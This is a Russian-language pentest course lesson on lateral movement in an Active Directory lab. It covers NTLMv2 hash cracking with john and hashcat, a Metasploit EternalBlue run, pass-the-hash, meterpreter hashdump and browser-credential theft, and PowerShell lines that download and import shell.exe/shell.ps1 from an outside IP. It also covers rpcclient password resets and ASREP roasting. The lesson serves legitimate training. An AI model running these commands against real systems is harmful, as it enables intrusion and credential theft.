###### tags: `module9` [ToC] # Занятие 5 Горизонтальное перемещение(продолжерние 4-го) 10 шагов для успешной атаки на Windows Active Directory - https://cryptoworld.su/10-shagov-dlya-uspeshnoj-ataki-na-windows-active-directory/ Active Directory глазами хакера - https://bhv.ru/product/active-directory-glazami-hakera/ Атаки на домен - https://habr.com/ru/company/jetinfosystems/blog/449278/ Серия Infrastructure PenTest: Часть 3 - Работа - https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html !!! ## Видеозапись урока {%youtube 1MBNsgCBP6E %} ### timecodes 0:00:00 Ждем 0:24:10 Вступление и общий треп 0:29:40 Разбор вчерашней практики 0:33:35 Проверяем инфру и готовимся начать 0:37:20 Twick для Kali 0:38:20 Запускаемся инфру 0:40:30 Начинаем. Теория 1:03:00 Переходим к практике 1:05:30 Ставим респондер. Снова 1:08:30 Запускаем и обсуждаем респондер. 1:13:45 Arpspoof 1:19:55 Responder. Включаем все протоколы 1:28:30 Перерыв 1:31:25 Перерыв. Окно респондера. 1:37:30 Анализ результатов респондера 1:42:05 ntlm hash теория. 1:44:15 ntlm hash !! 1:47:42 ntlm hash Переходим к практике 1:49:44 Распаковка и подготовка словаря 1:53:45 Брутфорсим по словарю johnripper. 1:57:00 Брутфорсим по маске hashcat 2:10:50 Pass-the-hash теория 2:14:20 Реверс подключение. msvenom+meterpreter 2:19:40 Подключились. Собираем локальные хэши 2:22:20 Повышаем привилегии. kiwi 2:23:25 Повышаем привилегии. windows-kernel-exploit 2:27:20 Повышаем привилегии. mfc 2:38:15 Ethernalblue 2:40:37 !! пояснения 2:41:50 Перерыв. тихо. 2:56:20 Вспоминаем что проделали 2:58:15 Используем найденный hash для подключения 3:04:20 Траблшутим path-the-hash подключение 3:09:25 !! Предположение об ошибке. 3:12:48 gather/credentials 3:14:46 !! Kerberos 3:15:28 Атака на домен 3:17:00 Kiwi !!! 3:21:20 Пробуем подключиться к домену 3:24:40 smbghost 3:27:00 Ищем как запустить smbghost 3:28:50 Переключились на другую лабу со свежим Kali (все сначала) 3:32:16 пробуем забрать модуль с другой Kali 3:34:20 Продолжаем на новой лабе 3:39:00 Пробуем smbghost снова. безуспешно 3:42:00 Ресетим win10 и пробуем снова. общий треп 3:49:20 Домашка ## Настройка лабы ### Схема стенда для лабораторной работы Продолжаем использовать стенд из [4-го занятия](https://hackmd.io/@jaberez/ByYCisC3K) ![](https://i.imgur.com/ozcfSy5.png) ## Разбор полученных хэшей как получить hash'и, [можно почитать тут](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/) По результатам прежнего урока мы уже собрали ряд хэшей. Используя инструменты такие как john-the-ripper и hashcat мы можем их преобразовать если нам повезет или хватит времени в пароли. ``` ┌──(root💀kali)-[/home/user/responder/logs] └─# ls -ll Analyzer-Session.log Poisoners-Session.log SMBRelay-Session.txt Config-Responder.log Proxy-Auth-NTLMv2-192.168.1.15.txt SMB-Relay-SMB-192.168.1.15.txt HTTP-NTLMv2-192.168.1.15.txt Responder-Session.log ``` ### johntheripper Тут все очень просто, собранные респондером файлы хэшей уже готовы для использования приложением и достаточно просто запустить приложение и указать файл с хэшами. ``` ┌──(root💀kali)-[/home/user/responder/logs] └─# john HTTP-NTLMv2-192.168.1.15.txt Using default input encoding: UTF-8 Loaded 3 password hashes with 2 different salts (1.5x same-salt boost) (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 2 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst qwe556T! (Administrator) qwe556T! (Administrator) qwe556T! (Administrator) 3g 0:00:00:01 DONE 2/3 (2022-01-16 10:31) 3.000g/s 12404p/s 13434c/s 20151C/s 123456..ralph Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed. ``` По умолчанию используется свой файл с паролями, но мы можем использовать и свой словарь. :exclamation: John работает только с CPU отсюда и проигрыш в скорости в сравнении с hashcat, но для перебора словарей его вполне хватает. ### hashcat https://www.4armed.com/blog/perform-mask-attack-hashcat/ Используя эту утилиту мы можем уже использовать не только словарь но и брутфорс по маске. hashcat ./HTTP-NTLMv2-192.168.1.15.txt -m 5600 -a 3 -O -w 2 ?l?l?l?d?d?d?u?s -m тип хэша в нашем случае это ntlmv2, его номер у hashcat 5600 -a тип атаки, в нашем случае 3 это перебор по маске -w тип профиля приложения в нашем случе это 2 - normal -O включить оптимизацию ?l?l?l?d?d?d?u?s - маска (l[ow], d[igit], u[p], s[ymbols] подробности в помощи к приложени. hashcat ./HTTP-NTLMv2-192.168.1.15.txt -m 5600 -a 3 -O -w 2 -1 ?l?d?u -i --increment-min=8 --increment-max=12 ?1?1?1?1?1?1?1?1?1?1?1?1 -i разрешаем диапазон длин для пароля --increment-min минимальная длина пароль, с которой начнеться перебор --increment-max максимальная. -1 в этом случае мы создаем свой уникальный набор символов, который объединил в себе l[ow], d[igit] и u[p] набор символов, который потом используеся в маске. ?1?1?1?1?1?1?1?1?1?1?1?1 в место 1 в процессе перебора будут подставляться символы из набора - буквы большие и маленькие и цифры от 0 до 9. ``` PS C:\Hacking\hashcat-6.1.1> .\hashcat.exe ./hash.txt -m 5600 -a 3 -O -w 4 ?l?l?l?d?d?d?u?s hashcat (v6.1.1) starting... OpenCL API (OpenCL 2.1 AMD-APP (3188.4)) - Platform #1 [Advanced Micro Devices, Inc.] ===================================================================================== * Device #1: Hawaii, 4032/4096 MB (3264 MB allocatable), 40MCU OpenCL API (OpenCL 1.2 ) - Platform #2 [Intel(R) Corporation] ============================================================= * Device #2: Intel(R) Celeron(R) CPU G1620 @ 2.70GHz, skipped * Device #3: Intel(R) HD Graphics, 1336/1400 MB (350 MB allocatable), 6MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 27 INFO: All hashes found in potfile! Use --show to display them. Started: Sun Jan 16 18:01:51 2022 Stopped: Sun Jan 16 18:01:52 2022 PS C:\Hacking\hashcat-6.1.1> .\hashcat.exe --show ADMINISTRATOR::HACKERU:fbca4e6d9741b077:087828f522511a4193ab7435959660bc:010100000000000056b7c3e0780ad8010982f349b632e29d000000000200080048004f003900440001001e00570049004e002d00430031004700340046004e00300032004e00480056000400140048004f00390044002e004c004f00430041004c0003003400570049004e002d00430031004700340046004e00300032004e00480056002e0048004f00390044002e004c004f00430041004c000500140048004f00390044002e004c004f00430041004c0008003000300000000000000000000000003000007249fd40e4b2e3981cf914844b2f82b425539548bc80645acf9b91415d4b5b550a001000000000000000000000000000000000000900120048005400540050002f0077007000610064000000000000000000:qwe556T! ADMINISTRATOR::HACKERU:0be4bfc21d81ddf0:7150ed1d4f485dfd74625351c7ade99a:010100000000000085b239e2780ad801f6a7170b9c8cec79000000000200080048004f003900440001001e00570049004e002d00430031004700340046004e00300032004e00480056000400140048004f00390044002e004c004f00430041004c0003003400570049004e002d00430031004700340046004e00300032004e00480056002e0048004f00390044002e004c004f00430041004c000500140048004f00390044002e004c004f00430041004c0008003000300000000000000000000000003000007249fd40e4b2e3981cf914844b2f82b425539548bc80645acf9b91415d4b5b550a001000000000000000000000000000000000000900120048005400540050002f0077007000610064000000000000000000:qwe556T! ``` Пароль успешно найден. ## Атаки ### EternalBlue EternalBlue использует уязвимости SMBv1 для вставки вредоносных пакетов данных и распространения вредоносных программ по сети . Эксплойт использует то, как Microsoft Windows обрабатывает или, скорее, неправильно обрабатывает специально созданные пакеты от злоумышленников. Пробуем подключиться к рабочей станции используя эту уязвимость. ``` [*] 192.168.1.15:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.1.15:445 - Sending all but last fragment of exploit packet [-] 192.168.1.15:445 - Errno::ECONNRESET: Connection reset by peer [*] Exploit completed, but no session was created. ``` Возможно это вызвано тем, что параллельно был запущен impacket-smbrelayx и перехватил подключение у eternalblue. Выключил и повторил команду. ``` msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 0.0.0.0:4444 [*] 192.168.1.15:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.1.15:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.1.15:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.1.15:445 - The target is vulnerable. [*] 192.168.1.15:445 - Connecting to target for exploitation. [+] 192.168.1.15:445 - Connection established for exploitation. [+] 192.168.1.15:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.15:445 - CORE raw buffer dump (42 bytes) [*] 192.168.1.15:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 192.168.1.15:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 192.168.1.15:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 192.168.1.15:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.15:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.1.15:445 - Sending all but last fragment of exploit packet [*] 192.168.1.15:445 - Starting non-paged pool grooming [+] 192.168.1.15:445 - Sending SMBv2 buffers [+] 192.168.1.15:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.15:445 - Sending final SMBv2 buffers. [*] 192.168.1.15:445 - Sending last fragment of exploit packet! [*] 192.168.1.15:445 - Receiving response from exploit packet [+] 192.168.1.15:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.15:445 - Sending egg to corrupted connection. [*] 192.168.1.15:445 - Triggering free of corrupted buffer. [-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 192.168.1.15:445 - Connecting to target for exploitation. [+] 192.168.1.15:445 - Connection established for exploitation. [+] 192.168.1.15:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.15:445 - CORE raw buffer dump (42 bytes) [*] 192.168.1.15:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 192.168.1.15:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 192.168.1.15:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 192.168.1.15:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.15:445 - Trying exploit with 17 Groom Allocations. [*] 192.168.1.15:445 - Sending all but last fragment of exploit packet [*] 192.168.1.15:445 - Starting non-paged pool grooming [+] 192.168.1.15:445 - Sending SMBv2 buffers [+] 192.168.1.15:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.15:445 - Sending final SMBv2 buffers. [*] 192.168.1.15:445 - Sending last fragment of exploit packet! [*] 192.168.1.15:445 - Receiving response from exploit packet [+] 192.168.1.15:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.15:445 - Sending egg to corrupted connection. [*] 192.168.1.15:445 - Triggering free of corrupted buffer. [-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 192.168.1.15:445 - Connecting to target for exploitation. [+] 192.168.1.15:445 - Connection established for exploitation. [+] 192.168.1.15:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.15:445 - CORE raw buffer dump (42 bytes) [*] 192.168.1.15:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 192.168.1.15:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 192.168.1.15:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 192.168.1.15:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.15:445 - Trying exploit with 22 Groom Allocations. [*] 192.168.1.15:445 - Sending all but last fragment of exploit packet [*] 192.168.1.15:445 - Starting non-paged pool grooming [+] 192.168.1.15:445 - Sending SMBv2 buffers [+] 192.168.1.15:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.15:445 - Sending final SMBv2 buffers. [*] 192.168.1.15:445 - Sending last fragment of exploit packet! [*] 192.168.1.15:445 - Receiving response from exploit packet [+] 192.168.1.15:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.15:445 - Sending egg to corrupted connection. [*] 192.168.1.15:445 - Triggering free of corrupted buffer. [-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] Exploit completed, but no session was created. ``` Не смотря на позитивный тест, подключиться все равно не получилось. При этом атакованная рабочая станция начал сильно лагать, перегрузить штатно не получилось. Пришлось выключать. >[FINGER] OS Version : Windows 7 Professional 7601 Service Pack 1 [FINGER] Client Version : Windows 7 Professional 6.1 Тоже повторилось и при повторном тесте. :octagonal_sign: В момент второй и третьей попытки рабочая станция повисла, а после и перегрузилась. Eternalblue выдал следующие строки ``` [-] 192.168.1.15:445 - SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds. [*] Exploit completed, but no session was created. ``` ### Pass-The-Hash https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/ :::info С точки зрения пентестинга: :exclamation: Вы МОЖЕТЕ выполнять атаки Pass-The-Hash с хешами NTLM . :exclamation: Вы НЕ МОЖЕТЕ выполнять атаки Pass-The-Hash с хешами Net-NTLM . ::: Для того что бы выполнять эту атаку нам необходимо получить локальные NTML, а для этого, как вариант, мы можем подключившись к компьютеру их сохранить к себе. https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html https://ethicalhackingguru.com/the-complete-ntlm-relay-attack-tutorial/ ## Пост эксплуатация ### Получение учетных записей Если мы получили метерпретер сессию к удаленному компу, то можем использовать комнады и модули meterpreter'a для сбора информации. . Как вариант подключения мы можем использовать способ описанный [тут](https://hackmd.io/6B1fJE07S6u4vgwIlqtm1w?view#smbrelayx-SMB-relay-NTLMv2). #### hashdump Подключившись мы можем получить необходимые дампы командой `hashdump`. В этот раз получилось, так как атакуемый пользователь обладает правами администратора. ``` meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:4707155ad2a1c0c09c05cd2577dbb203::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: user:1001:aad3b435b51404eeaad3b435b51404ee:100d1b20b208ff5a02e788f80bfb1256::: ``` Теперь рассмотрим, что если бы получили подключение к машине за которой сидит пользователь. Представим, что наш пользователь получил и выполнил наш реверсшел. Загрузим на win7 наш backdoor.exe с прошлого урока. Загрузить можем используя временный http сервер питона. `python -m SimpleHTTPServer` На стороне Kali перезапустим наш эксплойт командой `run` после разрыва прежнего подключения. Снова выполним `hashdump` ``` meterpreter > hashdump [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. meterpreter > ``` :heavy_exclamation_mark: если windows русский помогает эта команда `chcp 65001 ` #### kiwi module https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz load kiwi help creds_all Модуль gather в meterpreter #### post/../gather Можно попробовать модули пост обработки(post) для сбора(gather). Вытаскиваем SAM базу run post/windows/gather/hashdump Вытаскиваем ntds run post/windows/gather/domain_hashdump Есть модули и для сбора учетных данных(credentials) ``` meterpreter > run post/windows/gather/credentials/credential_collector [*] Running module against WIN7 [-] Error accessing hashes, did you migrate to a process that matched the target's architecture? ``` Можем попробовать получить учетные данные броузера доступных пользователей. В нашем случае, только атакованного пользователя ``` meterpreter > run post/windows/gather/credentials/chrome [*] Filtering based on these selections: [*] ARTIFACTS: All [*] STORE_LOOT: true [*] EXTRACT_DATA: true [-] Error loading USER S-1-5-21-1713449786-424582426-4167065957-1001: Profile doesn't exist or cannot be accessed [-] Error loading USER S-1-5-21-1713449786-424582426-4167065957-500: Profile doesn't exist or cannot be accessed [-] Error loading USER S-1-5-21-236004864-1829554240-97714527-500: Profile doesn't exist or cannot be accessed [*] Chrome's Cookies file found [*] Downloading C:\Users\j\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies [*] Chrome Cookies downloaded [+] File saved to: /root/.msf4/loot/20220116141249_default_192.168.1.15_chromeCookies_444116.bin [+] File with data saved: /root/.msf4/loot/20220116141249_default_192.168.1.15_EXTRACTIONSCooki_146699.bin [*] Chrome's Login data file found [*] Downloading C:\Users\j\AppData\Local\Google\Chrome\User Data\Default\Login Data [*] Chrome Login data downloaded [+] File saved to: /root/.msf4/loot/20220116141250_default_192.168.1.15_chromeLoginData_510025.bin [+] File with data saved: /root/.msf4/loot/20220116141250_default_192.168.1.15_EXTRACTIONSLogin_457927.bin [*] Chrome's History file found [*] Downloading C:\Users\j\AppData\Local\Google\Chrome\User Data\Default\History [*] Chrome History downloaded [+] File saved to: /root/.msf4/loot/20220116141251_default_192.168.1.15_chromeHistory_332011.bin [*] no such column: lower_term [*] PackRat credential sweep Completed meterpreter > ``` :::spoiler или другие из списка meterpreter > post/windows/gather/credentials/ post/windows/gather/credentials/aim post/windows/gather/credentials/ie post/windows/gather/credentials/seamonkey post/windows/gather/credentials/avira_password post/windows/gather/credentials/imail post/windows/gather/credentials/securecrt post/windows/gather/credentials/bulletproof_ftp post/windows/gather/credentials/imvu post/windows/gather/credentials/skype post/windows/gather/credentials/chrome post/windows/gather/credentials/incredimail post/windows/gather/credentials/smartermail post/windows/gather/credentials/comodo post/windows/gather/credentials/kakaotalk post/windows/gather/credentials/smartftp post/windows/gather/credentials/coolnovo post/windows/gather/credentials/kmeleon post/windows/gather/credentials/spark_im post/windows/gather/credentials/coreftp post/windows/gather/credentials/line post/windows/gather/credentials/srware post/windows/gather/credentials/credential_collector post/windows/gather/credentials/maxthon post/windows/gather/credentials/sso post/windows/gather/credentials/digsby post/windows/gather/credentials/mcafee_vse_hashdump post/windows/gather/credentials/steam post/windows/gather/credentials/domain_hashdump post/windows/gather/credentials/mdaemon_cred_collector post/windows/gather/credentials/tango post/windows/gather/credentials/dynazip_log post/windows/gather/credentials/meebo post/windows/gather/credentials/teamviewer_passwords post/windows/gather/credentials/dyndns post/windows/gather/credentials/miranda post/windows/gather/credentials/thunderbird post/windows/gather/credentials/enum_cred_store post/windows/gather/credentials/mremote post/windows/gather/credentials/tlen post/windows/gather/credentials/enum_laps post/windows/gather/credentials/mssql_local_hashdump post/windows/gather/credentials/tortoisesvn post/windows/gather/credentials/enum_picasa_pwds post/windows/gather/credentials/nimbuzz post/windows/gather/credentials/total_commander post/windows/gather/credentials/epo_sql post/windows/gather/credentials/opera post/windows/gather/credentials/trillian post/windows/gather/credentials/filezilla_server post/windows/gather/credentials/operamail post/windows/gather/credentials/viber post/windows/gather/credentials/flashfxp post/windows/gather/credentials/outlook post/windows/gather/credentials/vnc post/windows/gather/credentials/flock post/windows/gather/credentials/postbox post/windows/gather/credentials/windows_autologin post/windows/gather/credentials/ftpnavigator post/windows/gather/credentials/pulse_secure post/windows/gather/credentials/windows_sam_hivenightmare post/windows/gather/credentials/ftpx post/windows/gather/credentials/purevpn_cred_collector post/windows/gather/credentials/windowslivemail post/windows/gather/credentials/gadugadu post/windows/gather/credentials/qq post/windows/gather/credentials/winscp post/windows/gather/credentials/gpp post/windows/gather/credentials/razer_synapse post/windows/gather/credentials/wsftp_client post/windows/gather/credentials/heidisql post/windows/gather/credentials/razorsql post/windows/gather/credentials/xchat post/windows/gather/credentials/icq post/windows/gather/credentials/rdc_manager_creds post/windows/gather/credentials/xshell_xftp_password ::: ### Получение учетных записей домена Как получить [дамп хэшей паролей домена](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/). Сбор [учеток в Active Directory](https://xakep.ru/2020/03/20/windows-ad-harvesting/). Как искать критически важные данные при атаке на домен. ### CMD/Powershell если у нас есть шел до комьтера, то мы може получить полезную информацию и командами cmd, например: sysinfo whoami /all ipconfig Ипользую powershell команды можно Скачать файлы PowerShell.exe -c "Invoke-WebRequest -Uri http://10.10.15.136:9090/shell.exe -outfile C:\Users\svc_backup\Desktop\temp\shell.exe" PowerShell.exe -c "Invoke-WebRequest -Uri http://10.10.15.136:9090/shell.ps1 -outfile C:\Users\svc_backup\Desktop\temp\shell.ps1" Запустить файл на выполнение PowerShell.exe -c "import-module C:\Users\svc_backup\Desktop\temp\shell.ps1" ### Enum4linux https://labs.portcullis.co.uk/tools/enum4linux/ https://kali.tools/?p=5257 https://defcon.ru/penetration-testing/12816/ Enum4linux — это инструмент для перечисления информации из систем Windows и Samba. Программа написана на Perl и в своей основе представляет собой обёртку вокруг инструментов из пакета Samba: smbclient, rpclient, net и nmblookup. Поэтому вам нужно будет установить пакет Samba в качестве зависимости. Ключевые функции: + RID cycling (когда RestrictAnonymous установлено на 1 в Windows 2000) + Вывод списка пользователей (когда RestrictAnonymous установлено на 0 в Windows 2000) + Вывод информации о членстве в группе + Перечисление общих ресурсов + Определение, хост в рабочей группе или в домене + Идентификация удалённой операционной системы + Получение политики паролей (используя polenum) Получение списка общих ресурсов с контроллера домена enum4linux -S 192.168.1.100 Получение списка пользователей с контроллера домена enum4linux -U 192.168.1.100 Вариант «Делать все» enum4linux -a 192.168.1.100 Если мы уже смогли получить уже даже пользовательскую учетку, то мы сможем получить гораздо больше информации от контроллера домена enum4linux -u user -p '123qwe' -a 192.168.1.100 2>/dev/null ### smbclient https://bestestredteam.com/2019/03/15/using-smbclient-to-enumerate-shares/ SMBClient используется для подключения с smb шарам, но можно также использование для перечисления общих ресурсов smbclient -L 192.168.1.100 (анонимное подключение) smbclient //192.168.1.100/<sharename> smbmap -u anonymous -H 192.168.1.100 -r 'profiles$' | grep 2020 | awk -F ' ' '{print $8}' > users.txt (получить список) ``` ┌──(root💀kali)-[/home/user] └─# smbclient -L //192.168.1.15/C -W hackeru -U administrator 1 ⨯ Enter HACKERU\administrator's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C Disk C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 192.168.1.15 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` копирование файлов с удаленной машины smbclient //10.10.10.192/forensic -U audit2020 smb: \> prompt off smb: \> recurse on smb: \> mget commands_output ### smbmap https://hackware.ru/?p=11040#312 SMBMap позволяет пользователям перечислять диски общего доступа samba по всему домену. Программа составляет список совместных дисков, прав доступа на диск, общее содержимое, имеет функциональность выгрузки/загрузки, автоматическую загрузку файлов, имя которых совпадает с образцом и даже возможность удалённого выполнения команд. Этот инструмент был создан для тестирования на проникновение и предназначен для упрощения поиска потенциально чувствительных данных в крупных сетях. smbmap -u anonymous -H 192.168.1.100 -r 'profiles$'2 ### rpcclient rpcclient — утилита для запуска на стороне клиента функций MS-RPC и я вляется частью пакета samba. rpcclient утилита изначально разработанная для тестирования функциональности в самой Samba. Она пошла несколько этапов развития и стабильности. Сегодня многие системные администраторы пишут с помощью этой утилиты скрипты для управления Windows NT клиентом на рабочих станциях UNIX. https://smb-conf.ru/rpcclient-command-line-ms-rpc-client.html https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html https://linux.die.net/man/1/rpcclient https://linuxcommandlibrary.com/man/rpcclient rpcclient -U "" 10.10.10.192 (Проверим возможность нулевой сессии) enumdomusers (перечисление пользователей в домене) enumprivs (перечисление привилегий) enumdomgroups (перечисление доменных групп) setuserinfo2 {{username}} 23 'new_password' (сброс пароля на пользователя, но не выше твоих же привилегий) - источник https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P3-Exploitation.html queryuser {{username|rid}} (информация о пользователе) createdomuser {{username}} (создание нового пользователя в домене) rpcclient --user {{domain}}\{{username}}%{{password}} {{ip}} (подключние к удаленному хосту) rpcclient --user {{username}} --workgroup {{domain}} --no-pass {{ip}} (подключние к удаленному хосту без пароля) rpcclient --user {{domain}}\{{username}} --pw-nt-hash {{ip}} (подключние к удаленному хосту передав хэш пароля) rpcclient --user {{domain}}\{{username}}%{{password}} --command {{semicolon_separated_commands}} {{ip}} (выполнить команды оболочки на удаленном хосте) ASRep Roasting (атака) При атаке ASRep Roasting, сервер имеет три разных ответа: хеш пароля пользователя; у данного пользователя не выставлено UAF Dont Require PreAuth; такого пользователя нет в базе Kerberos. Таким образом, мы сможет узнать, существует пользователь или нет GetNPUsers.py BLACKFIELD.LOCAL/ -dc-ip 10.10.10.192 -no-pass -usersfile /root/HTB/blackfield/users.txt -outputfile hash.txt В файле вывода если найдутся легитимные пользователи будут хэши ### evil-winrm https://www.hackingarticles.in/evil-winrm-winrm-pentesting-framework/ Эту программу можно использовать на любых серверах Microsoft Windows с включенной этой функцией (обычно через порт 5985), конечно, только если у вас есть учетные данные и разрешения на ее использование. Таким образом, мы можем сказать, что его можно использовать на этапе взлома/пентестирования после эксплуатации. Цель этой программы — предоставить приятные и простые в использовании функции для взлома. Системные администраторы также могут использовать его в законных целях, но большинство его функций сосредоточены на взломе/пентестировании. Функции + Совместимость с клиентскими системами Linux и Windows + Загрузить в память сценарии Powershell + Загружать в память dll-файлы в обход некоторых антивирусов + Загружать в память сборки C# (C Sharp) в обход некоторых антивирусов + Загрузите полезные нагрузки x64, сгенерированные с помощью потрясающей техники пончиков. + Обход AMSI + Поддержка передачи хэша + Поддержка аутентификации Kerberos + Поддержка SSL и сертификатов + Загружать и скачивать файлы с индикатором выполнения + Список удаленных машинных служб без привилегий + История команд + Завершение команды WinRM + Завершение локальных файлов + Раскрашивание подсказок и выходных сообщений (можно отключить по желанию) + Поддержка Docker (готовые образы доступны на Dockerhub) + Захват ловушек, чтобы избежать случайного выхода из оболочки по Ctrl+C ## Повышение привелегий https://github.com/SecWiki/windows-kernel-exploits https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/ ## Прячем наше присутсвие ### Прячем наш выход в интеренет SSLH: Прячем [SSH/HTTPS/OpenVPN/Telegram за единым портом](https://habr.com/ru/post/412779/) 443